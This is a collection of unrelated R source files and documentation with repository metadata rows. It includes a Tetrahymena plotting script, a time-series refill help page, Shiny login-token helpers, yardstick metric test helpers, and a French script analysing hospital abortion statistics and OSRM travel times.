mydata <- mydata[!mydata$diameter <= 19.2,]
# Step 3: column means, grouped by culture and by glucose respectively.
# NOTE(review): `funs()` is deprecated in dplyr >= 0.8; the modern equivalent
# is `summarise_all(~ mean(.x, na.rm = TRUE))` (or `across()`).
# NOTE(review): meanGlucose summarises every remaining column, including any
# non-numeric ones, which makes mean() warn and return NA -- verify intent.
meanCulture <- mydata[,2:4] %>% group_by(culture) %>% summarise_all(funs(mean(., na.rm=TRUE)))
meanGlucose <- mydata %>% group_by(glucose) %>% summarise_all(funs(mean(., na.rm=TRUE)))
# Step 4: add natural-log transforms of concentration and diameter.
mydata$log_conc <- log(mydata$conc)
mydata$log_diameter <- log(mydata$diameter)
# Steps 5 and 6: log-log scatter plot with a separate linear fit
# (geom_smooth, method = lm) per glucose group.
ggplot(mydata, aes(x=log_conc, y=log_diameter,shape=glucose,color=glucose)) + geom_point() + geom_smooth(method=lm, se=FALSE, fullrange=TRUE)
# Save the most recent plot to PDF.
ggsave("tetrahymena_part_A_From_R_me1528.pdf")
| /tetrahymena_part_A_me1528.R | no_license | melzaky522/Final | R | false | false | 1,153 | r |
#install.packages("tidyverse")
#install.packages("dplyr")
#install.packages("ggplot2")
#load dplyr package
library("dplyr")
#load the ggplot2 package
library(ggplot2)
#load the tidyverse packa
library("tidyverse")
library("readr")
#Step 1: load the script the tsv file
mydata <- read_tsv("tetrahymena.tsv")
View(mydata)
#Step 2: removing the rows which has diameter <= 19.2
mydata <- mydata[!mydata$diameter <= 19.2,]
#Step 3: computing the mean for culture and glucose grouping, respectively
meanCulture <- mydata[,2:4] %>% group_by(culture) %>% summarise_all(funs(mean(., na.rm=TRUE)))
meanGlucose <- mydata %>% group_by(glucose) %>% summarise_all(funs(mean(., na.rm=TRUE)))
#Step 4: adding new columns for log_concentration and log_diameter, respectively
mydata$log_conc <- log(mydata$conc)
mydata$log_diameter <- log(mydata$diameter)
#Step 5 and 6: doing scatter plot using ggplot and geom_smooth to display the smooth line
ggplot(mydata, aes(x=log_conc, y=log_diameter,shape=glucose,color=glucose)) + geom_point() + geom_smooth(method=lm, se=FALSE, fullrange=TRUE)
#save the plot into PDF
ggsave("tetrahymena_part_A_From_R_me1528.pdf")
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/tigerhitteR.R
\name{dateRefill.fromData}
\alias{dateRefill.fromData}
\title{Complete the hollow dataset}
\usage{
dateRefill.fromData(data, dateCol.index, fixedCol.index,
uninterpolatedCol.index, uninterpolatedCol.newValue)
}
\arguments{
\item{data}{The data.frame dataset which is ready to be processed}
\item{dateCol.index}{Date column}
\item{fixedCol.index}{A vector of column indices whose values should be kept the same as in the original records}
\item{uninterpolatedCol.index}{The index of the column whose value should be changed to a different value in newly inserted records.}
\item{uninterpolatedCol.newValue}{The value of a specific column which should be put into the new record.}
}
\value{
The dataset which is completed.
}
\description{
Take time series dataset and fields, then refill the missing date records and other fields.
}
\details{
Real time series sales datasets may not be continuous in the 'date' field: for example, monthly
sales data can be continuous while the corresponding daily data has gaps.
Such an incomplete dataset is not suitable for time series analysis. The function dateRefill.fromData
is a transformation which turns an incomplete dataset into a complete one.
}
\examples{
# mydata <- data.example
# mydata.final <- dateRefill.fromData(data = mydata,dateCol = 2,fixedVec = c(3:10),
# uninterpolatedCol.index = 11,uninterpolatedCol.newValue = 0)
}
\author{
Will Kuan
}
| /man/dateRefill.fromData.Rd | no_license | aiien61/tigerhitteR | R | false | true | 1,456 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/tigerhitteR.R
\name{dateRefill.fromData}
\alias{dateRefill.fromData}
\title{Complete the hollow dataset}
\usage{
dateRefill.fromData(data, dateCol.index, fixedCol.index,
uninterpolatedCol.index, uninterpolatedCol.newValue)
}
\arguments{
\item{data}{The data.frame dataset which is ready to be processed}
\item{dateCol.index}{Date column}
\item{fixedCol.index}{A row of column number which should be kept same values with the original}
\item{uninterpolatedCol.index}{The column number which should be changed to different value into new record.}
\item{uninterpolatedCol.newValue}{The value of a specific column which should be put into the new record.}
}
\value{
The dataset which is completed.
}
\description{
Take time series dataset and fields, then refill the missing date records and other fields.
}
\details{
Real time series sales dataset could be not continuous in 'date' field. e.g., monthly sales data is continuous,
but discrete in daily data.
This hollow dataset is not complete for time series analysis. Function dateRefill.fromFile
is a transformation which tranforms uncomplete dataset into complete dataset.
}
\examples{
# mydata <- data.example
# mydata.final <- dateRefill.fromData(data = mydata,dateCol = 2,fixedVec = c(3:10),
# uninterpolatedCol.index = 11,uninterpolatedCol.newValue = 0)
}
\author{
Will Kuan
}
|
# Fallback login-link UI: renders an anchor pointing at the app URL with the
# login token appended. Fix: the `new.tab` / `target` arguments were computed
# but never used, so the manual link always opened in the current tab even
# when the automatic redirect opened a new one.
target.app.token.link.ui = function(app.url, tok, url = token.login.url(app.url, tok), new.tab=TRUE, target=if (new.tab) "_blank" else "") {
  # Only emit a target attribute when one was requested; an empty
  # target='' attribute is not equivalent to omitting it.
  target.attr = if (nzchar(target)) paste0(" target='", target, "'") else ""
  tagList(
    HTML(paste0("<a href='", url, "'", target.attr, ">Click here if the app does not open automatically</a>"))
  )
}
# Log the user in by opening `app.url` with the login token appended, via a
# client-side JavaScript `window.open(url, target)` call.
# NOTE(review): `app` is accepted (defaulting to getApp()) but is not used in
# the body -- presumably kept for API symmetry; confirm before removing.
open.app.with.login.token = function(app.url, tok, app=getApp(), new.tab=TRUE,target=if (new.tab) "_blank" else "", url = token.login.url(app.url, tok=tok)) {
  restore.point("open.app.with.login.token")
  # target == "_blank" (the default for new.tab = TRUE) opens a new tab.
  callJS(.fun = "window.open",list(url,target))
}
# Token used for anonymous visitors: a guest identity created now, whose
# token never expires (validUntil = Inf).
clicker.default.token = function() {
  created.at = Sys.time()
  list(userid = "Guest", created = created.at, validUntil = Inf)
}
| /R/token.R | no_license | skranz/courserClicker | R | false | false | 605 | r | target.app.token.link.ui = function(app.url, tok,url = token.login.url(app.url, tok),new.tab=TRUE,target=if (new.tab) "_blank" else "") {
tagList(
HTML(paste0("<a href='",url,"'>Click here if the app does not open automatically</a>"))
)
}
open.app.with.login.token = function(app.url, tok, app=getApp(), new.tab=TRUE,target=if (new.tab) "_blank" else "", url = token.login.url(app.url, tok=tok)) {
restore.point("open.app.with.login.token")
callJS(.fun = "window.open",list(url,target))
}
clicker.default.token = function() {
list(userid="Guest", created=Sys.time(), validUntil=Inf)
}
|
# These helpers are used to test macro and macro weighted methods
# Build the fixed 3x3 confusion-matrix fixture used throughout these helpers.
data_three_by_three <- function() {
  values <- c(
    3, 1, 1,
    0, 4, 2,
    1, 3, 5
  )
  labels <- c("c1", "c2", "c3")
  mat <- matrix(values, nrow = 3, byrow = TRUE, dimnames = list(labels, labels))
  as.table(mat)
}
# Shared 3x3 confusion-matrix fixture, plus the column-proportion weights
# used by the macro-weighted averaging helper below.
multi_ex <- data_three_by_three()
weighted_macro_weights <- colSums(multi_ex) / sum(colSums(multi_ex))
# turn a 3x3 conf mat into a 2x2 submatrix in a one vs all approach
# Collapse a square confusion matrix into the 2x2 "one vs all" matrix for
# class `col`: the selected row/column stays, everything else is summed.
make_submat <- function(data, col) {
  keep <- col
  tl <- data[keep, keep]
  tr <- sum(data[keep, -keep])
  bl <- sum(data[-keep, keep])
  br <- sum(data[-keep, -keep])
  as.table(matrix(c(tl, tr, bl, br), nrow = 2, byrow = TRUE))
}
# One 2x2 "one vs all" collapse per class of the shared fixture.
# The macro / weighted-macro helpers below compute the binary metric on each
# sub-matrix and then average the per-class results.
multi_submats <- list(
  c1 = make_submat(multi_ex, 1),
  c2 = make_submat(multi_ex, 2),
  c3 = make_submat(multi_ex, 3)
)
# Just pass in a binary metric function
# Macro average: apply `binary_metric` to each one-vs-all sub-matrix and take
# the unweighted mean of the per-class values.
macro_metric <- function(binary_metric, event_level = "first", ...) {
  per_class <- vapply(
    multi_submats, binary_metric, numeric(1),
    event_level = event_level, ...
  )
  mean(per_class)
}
# Weighted macro average: as macro_metric(), but weight each class by its
# share of the total observations (weighted_macro_weights).
macro_weighted_metric <- function(binary_metric, event_level = "first", ...) {
  per_class <- vapply(
    multi_submats, binary_metric, numeric(1),
    event_level = event_level, ...
  )
  stats::weighted.mean(per_class, weighted_macro_weights)
}
# For micro examples, we calculate the pieces by hand and use them individually
# Per-class counts for micro-averaged metrics, taken from the one-vs-all
# sub-matrices: tp / tn are the diagonal cells, p / n the column totals,
# and fp / fn are derived from those.
data_three_by_three_micro <- function() {
  extract <- function(f) vapply(multi_submats, f, double(1))
  out <- list(
    tp = extract(function(x) {
      x[1, 1]
    }),
    p = extract(function(x) {
      colSums(x)[1]
    }),
    tn = extract(function(x) {
      x[2, 2]
    }),
    n = extract(function(x) {
      colSums(x)[2]
    })
  )
  out$fp <- out$p - out$tp
  out$fn <- out$n - out$tn
  out
}
| /tests/testthat/helper-macro-micro.R | permissive | tidymodels/yardstick | R | false | false | 2,039 | r | # These helpers are used to test macro and macro weighted methods
# 3x3 confusion matrix (classes c1..c3) used as the multiclass fixture for
# the macro / macro-weighted / micro averaging tests.
data_three_by_three <- function() {
  counts <- c(
    3, 1, 1,
    0, 4, 2,
    1, 3, 5
  )
  labs <- c("c1", "c2", "c3")
  as.table(matrix(counts, nrow = 3, byrow = TRUE, dimnames = list(labs, labs)))
}
multi_ex <- data_three_by_three()
weighted_macro_weights <- colSums(multi_ex) / sum(colSums(multi_ex))
# turn a 3x3 conf mat into a 2x2 submatrix in a one vs all approach
# Reduce a square confusion matrix to the 2x2 one-vs-all table for class
# `col`: cell [1,1] is the class-vs-class count, the other three cells
# aggregate the remaining rows/columns.
make_submat <- function(data, col) {
  in_in   <- data[col, col]
  in_out  <- sum(data[col, -col])
  out_in  <- sum(data[-col, col])
  out_out <- sum(data[-col, -col])
  as.table(matrix(c(in_in, in_out, out_in, out_out), nrow = 2, byrow = TRUE))
}
# These are the "one vs all" sub matrices
# for macro / weighted macro, calculate the binary version of each metric
# and then average them together
multi_submats <- list(
c1 = make_submat(multi_ex, 1),
c2 = make_submat(multi_ex, 2),
c3 = make_submat(multi_ex, 3)
)
# Just pass in a binary metric function
# Macro-average a binary metric: evaluate it on every one-vs-all submatrix
# and take the unweighted mean over classes.
macro_metric <- function(binary_metric, event_level = "first", ...) {
  per_class <- vapply(
    multi_submats,
    binary_metric,
    numeric(1),
    event_level = event_level,
    ...
  )
  mean(per_class)
}
# Weighted macro-average of a binary metric: evaluate it on every one-vs-all
# submatrix, then average with the class-frequency weights
# (weighted_macro_weights).
macro_weighted_metric <- function(binary_metric, event_level = "first", ...) {
  per_class <- vapply(
    multi_submats,
    binary_metric,
    numeric(1),
    event_level = event_level,
    ...
  )
  stats::weighted.mean(per_class, weighted_macro_weights)
}
# For micro examples, we calculate the pieces by hand and use them individually
# Per-class pieces for micro averaging, pulled from the one-vs-all
# submatrices: tp = cell [1,1], p = column-1 total, tn = cell [2,2],
# n = column-2 total, plus the derived fp = p - tp and fn = n - tn.
data_three_by_three_micro <- function() {
  per_class <- function(f) vapply(multi_submats, f, double(1))
  pieces <- list(
    tp = per_class(function(x) x[1, 1]),
    p  = per_class(function(x) colSums(x)[1]),
    tn = per_class(function(x) x[2, 2]),
    n  = per_class(function(x) colSums(x)[2])
  )
  pieces$fp <- pieces$p - pieces$tp
  pieces$fn <- pieces$n - pieces$tn
  pieces
}
|
## Imports des librairies
library(haven)
library(plyr)
library(dplyr)
library(reshape)
library(devtools)
library(data.table)
library(cartography)
library(rgdal)
library(SpatialPosition)
library(xlsx)
library(osrm)
options(osrm.server="http://0.0.0.0:5000/")
## Chargement de la base sur les établissements
devtools::install_github('jomuller/finess',ref='47de6e2')
data(finess_geo, package = 'finess')
## Ajout des données de la Statistique annuelle des établissements (base statistique) 2013-2018
## http://www.data.drees.sante.gouv.fr/ReportFolders/reportFolders.aspx
datp2013<-read_sas("files/perinat_p_2013a.sas7bdat")
datp2014<-read_sas("files/perinat_p_2014a.sas7bdat")
datp2015<-read_sas("files/perinat_p_2015a.sas7bdat")
datp2016<-read_sas("files/perinat_p_2016a.sas7bdat")
datp2017<-read_sas("files/perinat_p_2017r.sas7bdat")
datp2018<-read_sas("files/perinat_p_2018.sas7bdat")
## Ajout du nombre de médecins participant à l'activité d'IVG (SAE/MIVG) mais les chiffres sont mauvais
mivg2013<-subset(datp2013,PERSO=="MIVG")
mivg2014<-subset(datp2014,PERSO=="MIVG")
mivg2015<-subset(datp2015,PERSO=="MIVG")
mivg2016<-subset(datp2016,PERSO=="MIVG")
mivg2017<-subset(datp2017,PERSO=="MIVG")
mivg2018<-subset(datp2018,PERSO=="MIVG")
mivg<-rbind(mivg2013,mivg2014,mivg2015,mivg2016,mivg2017,mivg2018)
names(mivg)[names(mivg) == "EFFPL"] <- "EFFPL_IVG"
names(mivg)[names(mivg) == "EFFPA"] <- "EFFPA_IVG"
names(mivg)[names(mivg) == "ETP"] <- "ETP_IVG"
mivg<-subset(mivg,select=-c(PERSO,GAR,GARDED,ASTDED,AST,BOR))
## Ajout du nombre de médecins gynécos (SAE/M2050)
mgy_2013<-subset(datp2013,PERSO=="M2050")
mgy_2014<-subset(datp2014,PERSO=="M2050")
mgy_2015<-subset(datp2015,PERSO=="M2050")
mgy_2016<-subset(datp2016,PERSO=="M2050")
mgy_2017<-subset(datp2017,PERSO=="M2050")
mgy_2018<-subset(datp2018,PERSO=="M2050")
mgy<-rbind(mgy_2013,mgy_2014,mgy_2015,mgy_2016,mgy_2017,mgy_2018)
names(mgy)[names(mgy) == "EFFPL"] <- "EFFPL_GY"
names(mgy)[names(mgy) == "EFFPA"] <- "EFFPA_GY"
names(mgy)[names(mgy) == "ETP"] <- "ETP_GY"
mgy<-subset(mgy,select=-c(PERSO,GAR,GARDED,ASTDED,AST,BOR))
mivg<-merge(mivg,mgy,by.x=c("AN","FI_EJ","FI"),by.y=c("AN","FI_EJ","FI"),all.x=TRUE,all.y=TRUE)
## Nombre d'actes IVG et accouchements (PERINAT / SAE)
dat2013<-read_sas("files/perinat_2013r.sas7bdat")
dat2014<-read_sas("files/perinat_2014r.sas7bdat")
dat2015<-read_sas("files/perinat_2015r.sas7bdat")
dat2016<-read_sas("files/perinat_2016r.sas7bdat")
dat2017<-read_sas("files/perinat_2017r.sas7bdat")
dat2018<-read_sas("files/perinat_2018.sas7bdat")
nivg<-rbind.fill(dat2014,dat2013,dat2015,dat2016,dat2017,dat2018)
## FICHIER FINAL
ivg<-merge(mivg,nivg,by.x=c("AN","FI_EJ","FI"),by.y=c("AN","FI_EJ","FI"),all.x=TRUE,all.y=TRUE)
## Ajout des infos de la base Finess
ivg<-merge(ivg,finess_geo,by.x="FI",by.y="nofinesset",all.x=TRUE)
## AJOUTS COLONNES
# Nombre d'accouchements (enfants morts-nés compris)
ivg$ACC<-ivg$ACCMU+ivg$ACCUN
# Département
ivg$DPT<-substr(ivg$FI,start=1,stop=2)
dpt_reg<-read.csv("files/departement2019.csv",sep=",",col.names=c("dep","reg","cheflieu","tncc","ncc","nccenr","libelle"))
ivg<-merge(ivg,dpt_reg,by.x="DPT",by.y="dep",all.x=TRUE)
## Renseigner les établissements sans info
finess_old<-read.csv("files/finess_old.csv",sep=";",col.names=c("nofinesset","nofinessej","rs","rslongue","complrs","compldistrib","numvoie","typvoie","voie","compvoie","lieuditbp","region","libregion","departement","libdepartement","cog","codepostal","libelle_routage","ligneacheminement","telephone","telecopie","categetab","libcategetab","liblongcategetab","categretab","libcategretab","siret","codeape","libcodeape","mft","libmft","liblongmft","sph","libsph","numen","coordx","coordy","sourcegeocod","dategeocod","dateautor","dateouvert","datemaj","lat","lon"),stringsAsFactors=FALSE,colClasses=c(rep("character",44)))
ivg$rs[is.na(ivg$lat)]<-finess_old$rs[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lat))]
ivg$departement[is.na(ivg$lat)]<-finess_old$departement[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lat))]
ivg$lat[is.na(ivg$lat)]<-finess_old$lat[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lat))]
ivg$lon[is.na(ivg$lon)]<-finess_old$lon[match(ivg$FI,finess_old$nofinesset)][which(is.na(ivg$lon))]
## EXPORT
write.csv(ivg,file="ivg.csv",row.names = FALSE)
## Nettoyage
rm(mivg2013,mivg2014,mivg2015,mivg2016,mivg2017,mivg2018)
rm(mgy_2013,mgy_2014,mgy_2015,mgy_2016,mgy_2017,mgy_2018)
rm(datp2013,datp2014,datp2015,datp2016,datp2017,datp2018)
rm(dat2013,dat2014,dat2015,dat2016,dat2017,dat2018)
rm(nivg,mivg,mgy)
## Nb. établissements 12-14 (SAE)
ivg %>% filter(IVG1214 > 0 & AN == "2018") %>% nrow
ivg %>% filter(IVG-IVGME > 0 & AN == "2018") %>% nrow
ivg %>% filter(IVG > 0 & AN == "2018") %>% nrow
ivg %>% filter(IVG1214 > 0 & AN == "2018") %>% cast(libcategetab~AN,length,value="IVG1214") %>% View
ivg %>% filter(IVG-IVGME > 0 & AN == "2018") %>% cast(libcategetab~AN,length,value="IVG") %>% View
ivg %>% filter(IVG > 0 & AN == "2018") %>% cast(libcategetab~AN,length,value="IVG") %>% View
### Medical-abortion rate per establishment
### (bands: under 5% / below mean / above mean / above 95%)
### Mean: 0.5416
ivg$tx_me<-ivg$IVGME/ivg$IVG
# Inf arises when IVG == 0 while IVGME > 0; treat those as 100% medical.
ivg$tx_me[is.infinite(ivg$tx_me)]<-1
# NOTE(review): the numerator filters AN == "2017" but the denominator
# AN == "2018" — mixing two years looks like a copy-paste slip; confirm
# which single year is meant.
sum(ivg$IVGME[ivg$AN == "2017"],na.rm=TRUE)/sum(ivg$IVG[ivg$AN == "2018"],na.rm=TRUE)
mean(ivg$tx_me[ivg$AN == "2017"],na.rm=TRUE)
### Late-abortion (12-14 weeks) rate per establishment (none / few / average)
### Mean: 0.0761
ivg$tx_1214<-ivg$IVG1214/ivg$IVG
# NOTE(review): same 2017/2018 year mix as above — verify.
sum(ivg$IVG1214[ivg$AN == "2017"],na.rm=TRUE)/sum(ivg$IVG[ivg$AN == "2018"],na.rm=TRUE)
mean(ivg$tx_1214[ivg$AN == "2017"],na.rm=TRUE)
### Évolution 2013-2018 (IVG en hausse // stable // déroute)
ivg_export <- ivg %>% filter(AN == "2013" | AN == "2017") %>% group_by(FI) %>% arrange(AN, .by_group = TRUE) %>% mutate(ivg_change = (IVG/lag(IVG) - 1)) %>% mutate(acc_change = (ACC/lag(ACC) - 1)) %>% filter(AN == "2017")
ivg_export$cat_evol<-cut(ivg_export$ivg_change,breaks=c(-1.01,1,-0.05,0.05,13),labels=c("arrêt","en chute","stable","en hausse"),right=TRUE)
### EXPORT
write.csv(ivg_export[,c("FI","DPT","ligneacheminement","rs","libcategetab","IVG","IVGME","IVG1214","ACC","ivg_change","acc_change","cat_evol","tx_me","cat_medic","tx_1214","cat_1214","lat","lon")],"exports/ivg_export.csv",na="",row.names=FALSE)
## Exports étab. 2018
result<-ivg %>% filter(AN == "2013" | AN == "2018") %>% group_by(FI) %>% arrange(AN, .by_group = TRUE) %>% mutate(ivg_change = (IVG/lag(IVG) - 1)) %>% mutate(acc_change = (ACC/lag(ACC) - 1)) %>% filter(AN == "2018")
write.csv(result[,c("FI","DPT","ligneacheminement","rs","libcategetab","IVG","IVGME","ivg_change","acc_change")],"exports/change.csv",na="",row.names=FALSE)
write.csv(merge(subset(ivg_ccam,annee == "2018"),ivg[,c("FI","AN","IVG","IMG")],by.x=c("finess_geo","annee"),by.y=c("FI","AN"),all.x=TRUE)[,c("annee","finess_geo","dep","ligneacheminement","rs","libcategetab","nb_actes.c","nb_actes.m","nb_actes.img2","nb_actes.acc","tx","IVG","IMG")],"exports/ccam.csv",na="",row.names=FALSE)
write.csv(merge(subset(ivg_ccam,annee == "2017"),ivg[,c("FI","AN","IVG","IMG")],by.x=c("finess_geo","annee"),by.y=c("FI","AN"),all.x=TRUE)[,c("annee","finess_geo","dep","ligneacheminement","rs","libcategetab","nb_actes.c","nb_actes.m","nb_actes.img2","nb_actes.acc","tx","IVG","IMG")],"exports/ccam17.csv",na="",row.names=FALSE)
write.csv(subset(ivg[,c("AN","FI","DPT","ligneacheminement","rs","libcategetab","IVG","IVGME","IVG1214","lat","lon")],AN=="2018"),"exports/sae.csv",na="",row.names=FALSE)
## Nombre d'actes (base PMSI-CCAM)
## https://www.scansante.fr/open-ccam/open-ccam-2017
# Read one year of Open CCAM data (ScanSanté/PMSI) and reduce it, per
# geographic Finess establishment, to the counts of the three abortion act
# codes plus delivery acts.
#
# year: two-digit year as a character string ("15".."18"); used both in the
#       file name and in the layout switch below.
# Returns a data frame with columns nb_actes.c (aspiration/curettage),
# nb_actes.m (medical), nb_actes.img2 (second trimester), nb_actes.acc
# (deliveries) and an `annee` column.
read_ivgCCAM <- function(year) {
  filename = paste("files/open_ccam_",year,".csv",sep="")
  # The file layout gained columns in 2018. NOTE(review): `year` is a string,
  # so `year < 18` is a character comparison against "18"; correct for the
  # two-digit inputs "15".."17" but would misbehave for e.g. "9" — confirm
  # callers always pass two-digit strings.
  if(year < 18) {
    ccam<-read.csv(filename,sep=";",col.names=c("finess","finess_geo","ccam","nb_actes","dms","nb_sej_0_nuit","dep","reg"))
    ccam<-subset(ccam,select=-c(dms,nb_sej_0_nuit))
  }
  else {
    ccam<-read.csv(filename,sep=";",col.names=c("finess","finess_geo","ccam","nb_sejsea","nb_actes","dms","nb_sej_0_nuit","nb_actes_ambu","dep","reg"))
    ccam<-subset(ccam,select=-c(nb_sejsea,dms,nb_sej_0_nuit,nb_actes_ambu))
  }
  ## Abortion subsets, one per CCAM act code
  ivg_ccamc<-subset(ccam,ccam=="JNJD0020") ## evacuation of a gravid uterus by aspiration and/or curettage, first trimester
  ivg_ccamm<-subset(ccam,ccam=="JNJP0010") ## evacuation of a gravid uterus by medication, first trimester
  ivg_ccamimg<-subset(ccam,ccam=="JNJD0010") ## evacuation of a gravid uterus, second trimester, before 22 weeks of amenorrhea
  # Full outer joins so an establishment performing only one act type is kept.
  # NOTE(review): `suffix=` relies on partial matching of merge()'s `suffixes`
  # argument — it works, but spelling `suffixes=` out would be safer.
  ivg_ccam<-merge(ivg_ccamc,ivg_ccamm,by.x=c("finess","finess_geo","dep","reg"),by.y=c("finess","finess_geo","dep","reg"),all.x=TRUE,all.y=TRUE,suffix=c(".c",".m"))
  ivg_ccam<-merge(ivg_ccam,ivg_ccamimg,by.x=c("finess","finess_geo","dep","reg"),by.y=c("finess","finess_geo","dep","reg"),all.x=TRUE,all.y=TRUE)
  setnames(ivg_ccam,c("ccam","nb_actes"),c("ccam.img2","nb_actes.img2"))
  ## Delivery subsets (codes below carry a trailing activity digit vs the
  ## short forms listed in the next comment line)
  ## JQGD001, JQGD002, JQGD003, JQGD004, JQGD005, JQGD007, JQGD008, JQGD012, JQGD013, JQGA002, JQGA003, JQGA004, JQGA005, JQGD010
  ivg_acc<-subset(ccam,ccam %in% c("JQGD0010","JQGD0020","JQGD0030","JQGD0040","JQGD0050","JQGD0070","JQGD0080","JQGD0120","JQGD0130","JQGA0020","JQGA0030","JQGA0040","JQGA0050","JQGD0100"))
  ivg_acc<-aggregate(ivg_acc$nb_actes,list(ivg_acc$finess_geo),sum,na.rm=TRUE)
  colnames(ivg_acc)<-c("finess_geo","nb_actes.acc")
  # Inner join: establishments with abortions but no recorded deliveries drop
  # out here (merge() defaults to all = FALSE).
  ivg_ccam<-merge(ivg_ccam,ivg_acc,by.x="finess_geo",by.y="finess_geo")
  ## Add the 4-digit year
  ivg_ccam["annee"]<-paste("20",year,sep="")
  ivg_ccam<-subset(ivg_ccam,select=-c(ccam.c,ccam.m,ccam.img2))
  return(ivg_ccam)
}
ivg_ccam<-purrr::map_df(c("15","16","17","18"),read_ivgCCAM)
ivg_ccam$nb_actes<-rowSums(ivg_ccam[,c("nb_actes.c","nb_actes.m")],na.rm=TRUE)
ivg_ccam<-merge(ivg_ccam,finess_geo,by.x="finess_geo",by.y="nofinesset",all.x=TRUE)
dpt_reg<-read.csv("files/departement2019.csv",sep=",",col.names=c("dep","reg","cheflieu","tncc","ncc","nccenr","libelle"))
ivg_ccam<-merge(ivg_ccam,dpt_reg,by.x=c("dep","reg"),by.y=c("dep","reg"),all.x=TRUE)
in.dir<- ("geo")
## FRANCE METROP.
france_1<-readOGR(in.dir,layer="COMMUNE_1",verbose=FALSE)
france_r<-readOGR(in.dir,layer="REGION_1",verbose=FALSE)
## MAYOTTE
france_2<-readOGR(in.dir,layer="COMMUNE_2",verbose=FALSE)
## LA RÉUNION
france_3<-readOGR(in.dir,layer="COMMUNE_3",verbose=FALSE)
## GUADELOUPE
france_4<-readOGR(in.dir,layer="COMMUNE_4",verbose=FALSE)
## MARTINIQUE
france_5<-readOGR(in.dir,layer="COMMUNE_5",verbose=FALSE)
## GUYANE
france_6<-readOGR(in.dir,layer="COMMUNE_6",verbose=FALSE)
### Nettoyage des bases, préparation
### Établissements ayant proposé des IVG chir. dans l'année (2013, 2014 et 2018)
### Établissements ayant réalisé des IVG tardives dans l'année 2018
ivg_geo_2013<-subset(ivg,AN==2013 & IVG-IVGME > 0)
ivg_geo_2014<-subset(ivg,AN==2014 & IVG-IVGME > 0)
ivg_geo_2018<-subset(ivg,AN==2018 & IVG-IVGME > 0)
ivg1214_geo_2018<-subset(ivg,AN==2018 & IVG1214 > 0)
## Calcul des durées de trajet
## Calculer les parcours : osrm-extract france-latest.osm.pbf -p ~/Sites/dev/osrm-backend/profiles/car.lua
## Lancer le serveur : osrm-routed france-latest.osrm
# Compute, for every commune of a region, the shortest car travel time (in
# minutes, via the local OSRM server) to the nearest abortion-providing
# establishment — for 2013, 2014, 2018, and for the 12-14-weeks providers
# of 2018.
#
# region: one of "Mayotte", "Guadeloupe", "Martinique", "Reunion", "Guyane",
#         "Metropole".
# Returns a data frame with one row per commune: code, d2013, d2014, d2018,
# d1214, diff (= d2018 - d2013) and diff1214 (= d1214 - d2018).
#
# Refactor: the six copy-pasted region branches are collapsed into a config
# lookup, and the four duplicated OSRM loop bodies into one helper. OSRM
# request failures are now caught as NA (previously an osrmTable error
# aborted the whole run), and an unknown region stops with a clear message
# instead of failing later on an undefined `df`.
fetchDurees <- function(region) {
  # One entry per region: communes layer, progress label, departement codes,
  # and whether those codes are kept (DROM) or excluded (métropole keeps
  # everything except the DROM codes).
  configs <- list(
    Mayotte    = list(sp = france_2, label = "Mayotte",    deps = "9F", keep = TRUE),
    Guadeloupe = list(sp = france_4, label = "Guadeloupe", deps = "9A", keep = TRUE),
    Martinique = list(sp = france_5, label = "Martinique", deps = "9B", keep = TRUE),
    Reunion    = list(sp = france_3, label = "La Réunion", deps = "9D", keep = TRUE),
    Guyane     = list(sp = france_6, label = "Guyane",     deps = "9C", keep = TRUE),
    Metropole  = list(sp = france_1, label = "Métropole",
                      deps = c("9A", "9B", "9C", "9D", "9F"), keep = FALSE)
  )
  if (!region %in% names(configs)) {
    stop("fetchDurees: unknown region '", region, "'", call. = FALSE)
  }
  cfg <- configs[[region]]
  print(cfg$label)
  # Commune centroids reprojected to WGS84 (lon/lat), one row per commune.
  df <- data.frame(
    as.character(cfg$sp$INSEE_COM),
    coordinates(spTransform(cfg$sp, CRSobj = "+init=epsg:4326"))
  )
  colnames(df) <- c("id", "x", "y")
  # Restrict the establishment tables to the region's departements.
  filtre <- function(d) {
    if (cfg$keep) subset(d, departement %in% cfg$deps)
    else subset(d, !departement %in% cfg$deps)
  }
  destinations <- list(
    d2013 = filtre(ivg_geo_2013),
    d2014 = filtre(ivg_geo_2014),
    d2018 = filtre(ivg_geo_2018),
    d1214 = filtre(ivg1214_geo_2018)
  )
  labels <- c(d2013 = "2013", d2014 = "2014", d2018 = "2018",
              d1214 = "2018 (12-14)")
  iterations <- nrow(df)
  # Shortest duration from one commune centroid to any establishment of
  # `dst`; NA when the OSRM request (or the reduction) fails.
  duree_min <- function(src, dst) {
    tryCatch({
      mat <- osrmTable(src = src, dst = dst[, c("FI", "lon", "lat")])
      as.numeric(apply(mat$durations, 1, min))
    }, error = function(e) NA_real_)
  }
  duree <- data.frame(code = as.character(df$id), stringsAsFactors = FALSE)
  for (col in names(destinations)) {
    vals <- rep(NA_real_, iterations)
    for (i in seq_len(iterations)) {
      print(paste("Analysing for ", labels[[col]], " : ", df[i, 1],
                  " (", iterations - i, " to go)", sep = ""))
      vals[i] <- duree_min(df[i, c("id", "x", "y")], destinations[[col]])
    }
    duree[[col]] <- vals
  }
  # Evolution of access time: 2013 -> 2018, and the extra time needed to
  # reach a 12-14-weeks provider compared with any provider in 2018.
  duree$diff <- duree$d2018 - duree$d2013
  duree$diff1214 <- duree$d1214 - duree$d2018
  return(duree)
}
# France métrop.
duree_me<-fetchDurees("Metropole")
# Mayotte
duree_ma<-fetchDurees("Mayotte")
# La Réunion
duree_lr<-fetchDurees("Reunion")
# Guadeloupe
duree_ga<-fetchDurees("Guadeloupe")
# Martinique
duree_mt<-fetchDurees("Martinique")
# Guyane
duree_gy<-fetchDurees("Guyane")
duree<-rbind(duree_me,duree_ma,duree_lr,duree_ga,duree_mt,duree_gy)
#duree<-rbind(duree_ma,duree_lr,duree_ga,duree_mt,duree_gy)
## Croisement avec la population (rec. 2016 sauf Mayotte 2012)
pop2016<-read.csv("files/BTX_TD_POP1B_2016.csv",sep=";")
pop2016_ma<-read.csv("files/BTX_TD_POP1B_2012.csv",sep=";")
pop2016<-rbind.fill(pop2016,pop2016_ma)
